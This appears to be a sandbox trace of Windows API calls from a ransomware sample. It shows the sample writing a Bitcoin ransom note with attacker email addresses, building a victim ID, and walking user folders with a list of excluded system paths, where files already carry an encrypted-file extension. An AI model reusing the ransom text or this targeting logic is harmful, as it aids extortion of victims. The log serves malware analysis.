	[0183.704] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0183.704] WriteFile (in: hFile=0x384, lpBuffer=0x18a438*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18b35c, lpOverlapped=0x0 | out: lpBuffer=0x18a438*, lpNumberOfBytesWritten=0x18b35c*=0xc46, lpOverlapped=0x0) returned 1
	[0183.707] CloseHandle (hObject=0x384) returned 1
	[0183.707] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a408, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a408*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0183.707] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.707] GetUserNameA (in: lpBuffer=0x18a2ec, pcbBuffer=0x18a404 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a404) returned 1
	[0183.709] wsprintfW (in: param_1=0x18b288, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0183.709] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\XO5lwhfEXk\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0183.709] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0183.709] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0183.710] WriteFile (in: hFile=0x384, lpBuffer=0x18b288*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18b364, lpOverlapped=0x0 | out: lpBuffer=0x18b288*, lpNumberOfBytesWritten=0x18b364*=0x30, lpOverlapped=0x0) returned 1
	[0183.710] CloseHandle (hObject=0x384) returned 1
	[0183.710] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0183.710] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0183.710] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0183.711] wsprintfW (in: param_1=0x18b040, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\XO5lwhfEXk\\HELP_DECRYPT_YOUR_FILES.HTML") returned 69
	[0183.711] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\XO5lwhfEXk\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0183.711] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0183.711] WriteFile (in: hFile=0x384, lpBuffer=0x18a834*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0x18a834*, lpNumberOfBytesWritten=0x18b358*=0x808, lpOverlapped=0x0) returned 1
	[0183.714] CloseHandle (hObject=0x384) returned 1
	[0183.714] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0183.715] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a81c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a81c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0183.715] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.715] GetUserNameA (in: lpBuffer=0x18a700, pcbBuffer=0x18a818 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a818) returned 1
	[0183.727] wsprintfA (in: param_1=0x18b248, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0183.727] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\XO5lwhfEXk\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0183.728] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0183.728] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0183.728] WriteFile (in: hFile=0x384, lpBuffer=0x18b248*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18b360, lpOverlapped=0x0 | out: lpBuffer=0x18b248*, lpNumberOfBytesWritten=0x18b360*=0x43, lpOverlapped=0x0) returned 1
	[0183.728] CloseHandle (hObject=0x384) returned 1
	[0183.734] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\XO5lwhfEXk\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5d7777c0, ftCreationTime.dwHighDateTime=0x1d97052, ftLastAccessTime.dwLowDateTime=0x8704fa29, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x87075ffa, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb98f0
	[0183.735] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Desktop\\XO5lwhfEXk\\*.*") returned 44
	[0183.735] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0183.735] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Desktop\\XO5lwhfEXk\\*.*", cchLength=0x2c | out: lpsz="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\*.*") returned 0x2c
	[0183.735] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.735] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\*.*", lpSrch="windows") returned 0x0
	[0183.735] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.736] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\*.*", lpSrch="boot") returned 0x0
	[0183.736] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.736] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\*.*", lpSrch="system volume information") returned 0x0
	[0183.736] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.736] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0183.736] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.736] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\*.*", lpSrch="temp") returned 0x0
	[0183.737] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.737] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\*.*", lpSrch="program files") returned 0x0
	[0183.737] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.737] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\*.*", lpSrch="program files (x86)") returned 0x0
	[0183.737] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.737] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\*.*", lpSrch="appdata") returned 0x0
	[0183.737] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.737] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\*.*", lpSrch="application data") returned 0x0
	[0183.738] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.738] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\*.*", lpSrch="winnt") returned 0x0
	[0183.738] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.738] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\*.*", lpSrch="tmp") returned 0x0
	[0183.738] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.738] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\*.*", lpSrch="cache") returned 0x0
	[0183.738] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.738] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\*.*", lpSrch="temporary internet files") returned 0x0
	[0183.739] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.739] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\*.*", lpSrch="webcache") returned 0x0
	[0183.739] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.739] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\*.*", lpSrch="inetcache") returned 0x0
	[0183.739] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.739] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\*.*", lpSrch="nvidia") returned 0x0
	[0183.739] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.739] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\*.*", lpSrch="packages") returned 0x0
	[0183.740] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.740] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\*.*", lpSrch="cookies") returned 0x0
	[0183.740] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.740] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\xo5lwhfexk\\*.*", lpSrch="programdata") returned 0x0
	[0183.740] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0183.740] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0183.740] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5d7777c0, ftCreationTime.dwHighDateTime=0x1d97052, ftLastAccessTime.dwLowDateTime=0x8704fa29, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x87075ffa, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0183.740] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0183.741] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86ed3183, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x86ed3183, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x86ed3183, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x99f0, dwReserved0=0x0, dwReserved1=0x0, cFileName="-srnrgsbo-cmjxi.mp4.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="-SRNRG~1.SCL")) returned 1
	[0183.741] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86f1e70b, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x86f1e70b, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x86f1e70b, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x6fe0, dwReserved0=0x0, dwReserved1=0x0, cFileName="9lc2m1bibxn3uehcgc.swf.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="9LC2M1~1.SCL")) returned 1
	[0183.741] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86f6ab13, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x86f6ab13, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x86f6ab13, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc600, dwReserved0=0x0, dwReserved1=0x0, cFileName="amgg0wai -5.wav.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="AMGG0W~1.SCL")) returned 1
	[0183.741] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x87075ffa, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x87075ffa, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8709c01e, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0183.741] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x87075ffa, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x87075ffa, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x87075ffa, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0183.741] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86fb7468, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x86fb7468, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x86fb7468, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xd7d0, dwReserved0=0x0, dwReserved1=0x0, cFileName="kt2grvxjb8knckn865l.mkv.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="KT2GRV~1.SCL")) returned 1
	[0183.741] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x87003608, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x87003608, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x87003608, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x3480, dwReserved0=0x0, dwReserved1=0x0, cFileName="myz _.jpg.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="MYZ_JP~1.SCL")) returned 1
	[0183.741] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x87029831, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x87029831, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8704fa29, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x18990, dwReserved0=0x0, dwReserved1=0x0, cFileName="xs8rf2qg_ha6ykea1jet.gif.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="XS8RF2~1.SCL")) returned 1
	[0183.741] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x87029831, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x87029831, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8704fa29, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x18990, dwReserved0=0x0, dwReserved1=0x0, cFileName="xs8rf2qg_ha6ykea1jet.gif.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="XS8RF2~1.SCL")) returned 0
	[0183.741] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 1
	[0183.745] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 0
	[0183.746] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x866a7020, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x866a7020, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x866a7020, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x15c20, dwReserved0=0x0, dwReserved1=0x0, cFileName="xz06.swf.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="XZ06SW~1.SCL")) returned 1
	[0183.746] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x866f3549, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x866f3549, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x867197c0, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x16200, dwReserved0=0x0, dwReserved1=0x0, cFileName="zn3qsas7zk7m3a.bmp.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="ZN3QSA~1.SCL")) returned 1
	[0183.746] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6b4115b0, ftCreationTime.dwHighDateTime=0x1d969a8, ftLastAccessTime.dwLowDateTime=0xa14c0, ftLastAccessTime.dwHighDateTime=0x1d97332, ftLastWriteTime.dwLowDateTime=0xa14c0, ftLastWriteTime.dwHighDateTime=0x1d97332, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zU8X 1dSMP0P", cAlternateFileName="ZU8X1D~1")) returned 1
	[0183.746] lstrcmpW (lpString1="zU8X 1dSMP0P", lpString2="..") returned 1
	[0183.746] lstrcmpW (lpString1="zU8X 1dSMP0P", lpString2=".") returned 1
	[0183.746] lstrcpyW (in: lpString1=0x18c29c, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop"
	[0183.746] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\"
	[0183.746] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="zU8X 1dSMP0P" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\zU8X 1dSMP0P") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\zU8X 1dSMP0P"
	[0183.746] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\zU8X 1dSMP0P" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\zU8X 1dSMP0P") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\zU8X 1dSMP0P"
	[0183.747] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\zU8X 1dSMP0P", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\zU8X 1dSMP0P\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\zU8X 1dSMP0P\\"
	[0183.747] lstrcpyW (in: lpString1=0x18b384, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\zU8X 1dSMP0P\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\zU8X 1dSMP0P\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\zU8X 1dSMP0P\\"
	[0183.747] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\zU8X 1dSMP0P\\", lpString2="*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\zU8X 1dSMP0P\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\zU8X 1dSMP0P\\*.*"
	[0183.747] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\zU8X 1dSMP0P\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6b4115b0, ftCreationTime.dwHighDateTime=0x1d969a8, ftLastAccessTime.dwLowDateTime=0xa14c0, ftLastAccessTime.dwHighDateTime=0x1d97332, ftLastWriteTime.dwLowDateTime=0xa14c0, ftLastWriteTime.dwHighDateTime=0x1d97332, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb98f0
	[0183.747] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Desktop\\zU8X 1dSMP0P\\*.*") returned 46
	[0183.748] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0183.748] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Desktop\\zU8X 1dSMP0P\\*.*", cchLength=0x2e | out: lpsz="c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\*.*") returned 0x2e
	[0183.749] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.749] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\*.*", lpSrch="windows") returned 0x0
	[0183.749] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.749] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\*.*", lpSrch="boot") returned 0x0
	[0183.749] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.749] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\*.*", lpSrch="system volume information") returned 0x0
	[0183.749] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.750] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0183.750] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.750] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\*.*", lpSrch="temp") returned 0x0
	[0183.750] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.750] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\*.*", lpSrch="program files") returned 0x0
	[0183.750] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.750] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\*.*", lpSrch="program files (x86)") returned 0x0
	[0183.750] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.751] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\*.*", lpSrch="appdata") returned 0x0
